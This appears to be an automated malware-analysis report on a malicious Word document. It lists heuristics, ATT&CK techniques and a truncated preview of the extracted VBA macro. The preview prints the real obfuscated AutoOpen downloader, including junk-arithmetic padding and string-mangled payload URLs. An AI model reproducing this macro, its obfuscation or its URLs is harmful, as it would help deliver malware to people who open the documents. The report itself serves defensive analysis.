MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The presence of an AutoOpen macro suggests it is designed to execute automatically upon opening. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' also points to a phishing lure, likely a downloader.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://wwwg1y+g1y.cher.VNT+V (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 86682 bytes |

SHA-256: 2914bfd08bf577bcce6a05b42e9348f7d9a5e4214dd0793657b8e994cf737207

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HnswGnSC"
Sub AutoOpen()
On Error Resume Next
iIkrckZra = (2772 * CStr(CtqWLCwtAYwH * Rnd(tKUrnwjhzG)) / 1988 / ChrB(zMfcBDGGtOYmRs * CBool(136465363 - CDbl(UVHuOlXirhHtm + rECnwXwXTswSs)))) + (179478542 / Fix(982) - LUXDzuiNa * Fix(rJbinvt + Log(TNCJVwVV)))
tzCOzwsJW = (2772 * CStr(JEurOdizvm * Rnd(UjXzmwfKCzYhdB)) / 1988 / ChrB(LLHvQSIRloPc * CBool(136465363 - CDbl(ZiXCiaZNiPKzNz + XkXQqhSTqA)))) + (179478542 / Fix(982) - cMRmKWWjlX * Fix(VzDbTjwwzCT + Log(tARzlRGLhCLzN)))
vsEobhNwv = (2772 * CStr(XMONlWtCT * Rnd(YYltXkPi)) / 1988 / ChrB(uTnGOXor * CBool(136465363 - CDbl(WVFqwlum + DVonAsnoXG)))) + (179478542 / Fix(982) - QqSilAvj * Fix(AqzflfwD + Log(ZAzkNLJWHSvS)))
ZzijrfDXF = (2772 * CStr(pKfWNXJBUujHwF * Rnd(jdGYOtdn)) / 1988 / ChrB(aqPzuAujcbKoF * CBool(136465363 - CDbl(zlNFwBiSBcTLC + wrEMXrwXIKHUzD)))) + (179478542 / Fix(982) - WuYamInAnil * Fix(Ipmfizw + Log(kWwRNuacCwdC)))
Application.Run "oIzVIQQbnSY", QtjivwDjBUPqd
fnihvkPnL = (2772 * CStr(RhlmniWiYWBVu * Rnd(wHNsiKwoBjZUKF)) / 1988 / ChrB(wiKXuFQfbGsG * CBool(136465363 - CDbl(aGAKtikoXX + AscjBMT)))) + (179478542 / Fix(982) - QuZorwzufb * Fix(lpDaOuiPafUw + Log(KEWCckiOnVp)))
dASJMtjFN = (2772 * CStr(mQzSOlSzsrww * Rnd(dmbzSuwXzUOwOc)) / 1988 / ChrB(DjwPjqYnZk * CBool(136465363 - CDbl(wLRudtfBo + kwRKQNowjV)))) + (179478542 / Fix(982) - JttLvhP * Fix(FwCNEwkG + Log(qVQMnBS)))
kiESdkrqO = (2772 * CStr(pRXjhLQtj * Rnd(hjMOfGlFOF)) / 1988 / ChrB(WsbbQcwfUGMzr * CBool(136465363 - CDbl(TjTIJzTD + lBSqnWwmcIZ)))) + (179478542 / Fix(982) - ZwIRiUOOR * Fix(jUHMXRwEFU + Log(OpZwmIIVU)))
kqSotnLra = (2772 * CStr(EpLQRzjbzhp * Rnd(DEALGiSwLG)) / 1988 / ChrB(wktCTTkGFdZQc * CBool(136465363 - CDbl(ZHADhIo + MnOnihcYiUw)))) + (179478542 / Fix(982) - PfYvPHPbkudnXH * Fix(aSsdzDRXFnf + Log(CdjwFRfoujEn)))
End Sub
Function QtjivwDjBUPqd()
On Error Resume Next
XTvwJ = (2772 * CStr(sqifZLNjPcBqbA * Rnd(GwTIinXnp)) / 1988 / ChrB(nwRlsXfztqtE * CBool(136465363 - CDbl(nBlSJoNSw + nZuXzKGUCptl)))) + (179478542 / Fix(982) - wvWFVtiJY * Fix(jjGsVOz + Log(TpOdMzzimmV)))
kpvacw = (2772 * CStr(lbcwjlIhG * Rnd(fXOmXMFhC)) / 1988 / ChrB(fmZlLGVYfQXzCk * CBool(136465363 - CDbl(aHBmpRIUoXaTip + iamplwBqmdPjCp)))) + (179478542 / Fix(982) - fVdnwEDvNiXRlO * Fix(mnjkiwMMzzYR + Log(JZiGftrFp)))
RSkwdb = Mid("9aPCYhSEi1ct8Du1y+g1yNTuniorg1y+g1ysharvVNT+VNTaVNT+VNTrd.comg1y+g1y/7ND7VNT+VNTMVNT+VNT/,http://wwwg1y+g1y.cher.VNT+V'+'NTcVNT+VNTomVNT+VNT.br/nE2LTYVNT+VNT/kN'+'QVNT+Vg1y+'+'g1yNXO", 16, 165)
DvMmhvQJSTu = (2772 * CStr(OXBnpXmjrZQYO * Rnd(OrqRlGDNaw)) / 1988 / ChrB(SiYGnGv * CBool(136465363 - CDbl(inIiTDzcPktYp + pjHrUBPnB)))) + (179478542 / Fix(982) - EmWpNdESVkjjFM * Fix(OndncjXLEs + Log(wvmtYulLZjhIO)))
WPiGXsio = (2772 * CStr(wPzjijk * Rnd(CchptjSFWk)) / 1988 / ChrB(sJNwEFBTG * CBool(136465363 - CDbl(inikvwJsBR + AvRwLiQL)))) + (179478542 / Fix(982) - VIqjFvkRsihNiz * Fix(pCEwkIMVSB + Log(NwBtWkHKzVwzf)))
fmuWlhV = (2772 * CStr(jbDEhFiuUGNl * Rnd(ZQhbRwYiIjbMlz)) / 1988 / ChrB(mqjfPBvFUGWnKD * CBool(136465363 - CDbl(fjmvMusFPLq + XubsvHkI)))) + (179478542 / Fix(982) - ahWzdLMUvJN * Fix(iAuZqlAtlQT + Log(tYKsOafavz)))
QiLERWANiPT = Mid("fbC25YlN'+'T+VNTdyVNT+VNT'+'.sig1y+g1yte/FVNT+VNTmV3iB/,ht'+'tp://wVNT+VNTww.d'+'ougV'+'NT+VNTsg1y+g1yunlimitVNT+VNTed.com/pg1y+g1yA7isz", 8, 125)
YiLzq = (2772 * CStr(LrzXkzV * Rnd(sGIdSbmInYfNho)) / 1988 / ChrB(zHzFTzCsF * CBool(136465363 - CDbl(zYQMziCWRD + ksRjXqiYSSSXbA)))) + (179478542 / Fix(982) - nuBwqODEU * Fix(WvppdqQ + Log(UPOfZwITUmGf)))
CksFs = (2772 * CStr(laTZCnwbZ * Rnd(zOYINPDHvi)) / 1988 / ChrB(VvpVDOhnztkSlo * CBool(136465363 - CDbl(FlXIMsuroljQtS + FkWVPfd)))) + (179478542 / Fix(982) - wYOobbN * Fix(mUOJRkmRDaDAjU + Log(oVtoAwPYUbjYjw)))
dQVuiQjB = (2772 * CStr(oMivIUU * Rnd(hhozdButj)) / 1988 / ChrB(bCnHlA
```
... (truncated)